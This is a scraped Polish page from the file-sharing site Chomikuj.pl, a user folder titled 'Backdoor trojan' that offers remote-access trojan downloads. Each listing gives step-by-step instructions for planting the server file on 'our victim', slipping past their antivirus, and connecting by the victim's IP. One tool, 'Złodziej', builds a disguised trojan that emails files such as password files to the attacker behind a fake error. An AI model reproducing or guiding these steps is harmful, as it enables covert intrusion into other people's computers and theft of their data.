Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

AntiMks 0.1 beta.zip

MeTopOrAFK / Backdoor trojan / AntiMks 0.1 beta.zip
Download: AntiMks 0.1 beta.zip

1,6 MB

0.0 / 5 (0 głosów)
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "AntiMks 0.1 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
AntiMks.exe, Setup.exe
2. Plik Setup.exe (czyli server) podrzucamy naszej ofiarze.
3. My zaś otwieramy plik AntiMks.exe za pomocą którego połączymy się z zainfekowanym komputerem (zakładka "Połącznie"). Uruchamia się program widziany na screenie:
<a><a><a>obrazek

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne foldery z plikami do pobrania
Inne pliki do pobrania z tego chomika
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie LaDe.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: LaDe 1.3.exe, serwerek.exe 3. Plik o nazwie serwerek.exe musimy podrzucić naszej ofiarze. 4. My zaś otwieramy plik o nazwie LaDe 1.3.exe (czyli clienta). Uruchamia się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie LaDe.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: LaDe 1.3.exe, serwerek.exe 3. Plik o nazwie serwerek.exe musimy podrzucić naszej ofiarze. 4. My zaś otwieramy plik o nazwie LaDe 1.3.exe (czyli clienta). Uruchamia się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz. obrazek
<a>obrazekObsługa programu: 1. Ściągamy skompresowany plik o nazwie Amitis v.1.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Amistis1.3.exe, Comperessor deccompressor.exe, Edit serwer.exe , Serwer.exe, Simulated serwer.exe 3. Najpierw otwierasz u siebie plik "Edit serwer.exe" Służy on do odpowiedniego skonfigurowania trojana. Potem zapisujesz ustawienia. 4. Wysyłasz do ofiary plik "Serwer.exe". Ona go musi u siebie odpalić. 5. Ty zaś otwierasz plik Amistis1.3.exe. Uruchamia się program widziny na screenie. Podajesz adres IP ofiary i łączysz się z zainfekowanym komputerem. <a>obrazek
Obsługa programu: 1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy dwa pliki: -acessor.exe (jest to plik client) -aserver.exe (jest to plik serwer) 2. Plik aserver.exe wysyłamy do naszej ofiary. 3. My zaś otwieramy plik acessor.exe. Uruchomi się program widziany na screenshocie. Za jego pomocą połączymy się z zainfekowanym komputerem. Podajemy HOST ofiary (który bez problemu ustalimy za pomocą jej adresu IP ) i klikamy na opcję Conectar (czyli połącz). To wszystko :) obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Big Ben 2.5.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Big Ben v.2.5 Klient.exe, Big Ben v.2.5 Server.exe 3. Plik o nazwie Big Ben v.2.5 Server.exe podrzucamy naszej ofiarze. 4. My zaś otwieramy plik Big Ben v.2.5 Klient.exe. Uruchomi się program widziany na screenie, w którym podajemy adres IP ofiary i klikamy na "Połącz" obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "RMF FM 1.1.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: rmf.exe, setup.exe 3. Plik o nazwie setup.exe (czyli serwer) podrzucamy naszej ofiarze. 4. My zaś otwieramy plik o nazwie rmf.exe (czyli client). Uruchomi się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na opcję "connect" obrazekobrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Matrix 1.03.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "The_Matrix.exe", "server.exe", "server2 (bez konfiga).exe" 3. Plik "server.exe" lub "server2 (bez konfiga).exe" musimy podesłać naszej ofiarze, Ofiara musi go otworzyć a jej antywir nic nie zczaić. 4. Następnie otwiearmy u siebie plik klient o nazwie "The_Matrix.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Connect ;] obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Beast v2.07 06-08-2004.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: Beast2.07.exe 3. Odpalamy u siebie plik Beast2.07.exe. Uruchamia się program widziany na screenie: obrazek4. Teraz musisz stworzyć plik serwer, który podrzucisz ofiarze. Klikasz na opcję "Build serwer" (zaznaczyłem tę opcje powyżej kolorem czerwonym) 5. Kiedy klikniesz na opcję "Build serwer" uruchomi się program widziany na screenie: obrazek Jak już odpowiednio skonfigurujesz trojana to klikasz na opcje "Save serwer" 6. Powstaje trojan który musisz podrzucić ofiarze. Ona go musi otworzyć. Ty zaś musisz otworzyć plik Beast2.07.exe Teraz podajesz Host ofiary i łączysz się zdalnie z zainfekowanym komputerem.
Obsługa programu: 1. Program złodziej służy do wykradania plików (małych) 2. Ściągamy skompresowany plik o nazwie Złodziej.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Odpalamy plik o nazwie konfigurator.exe Uruchamia się program widziany na screenie: obrazek5. W konfiguratorze podajemy e-mail na który ma zostać wysłany plik i lokacje pliku np: gdy chcemy ściągnąć od kogoś plik to podajemy swój e-mail i dowiadujemy się gdzie znajduje się plik który chcemy ściągnąć.Jeżeli ktoś np: posiada plik haslo.txt to musimy się dowiedzieć gdzie go trzyma np: C:\haslo.txt wpisujemy to w lokacje! WPISYWAĆ DOKŁADNIE! Klikamy Generuj. Powstaje Plik.exe (czyli trojan), możemy zmienić nazwę, ikonę i wysyłać ofiarze. 6. PLIK JEST NIEGROŹNY!!! po odpaleniu trojana wyskakuje fałszywy błąd: ERROR 615632187x Nie znaleziono taskmgr.dll który ma wprowadzić w błąd. Program wysyła podany plik z lokacji na e-mail i się wyłącza...
Obsługa programu: 1. Parszywiec działa na porcie 3023, i jak narazie nie dodaje się do rejestru. Posiada następujące funkcje: przeszukiwanie dysków, wysyłanie pliku na FTP 2. Ściągamy skompresowany plik o nazwie Parszywiec 1.1.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: parszywiec_k.exe, parszywiec_s.exe 4. Plik o nazwie Parszywiec_s.exe (czyli plik serwer) musimy podrzucić naszej ofiarze. 5. My zaś otwieramy plik o nazwie parszywiec_k.exe (czyli plik client). Uruchamia się program widziany na screenie w którym podajemy adres IP i klikamy na połącz. obrazek
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności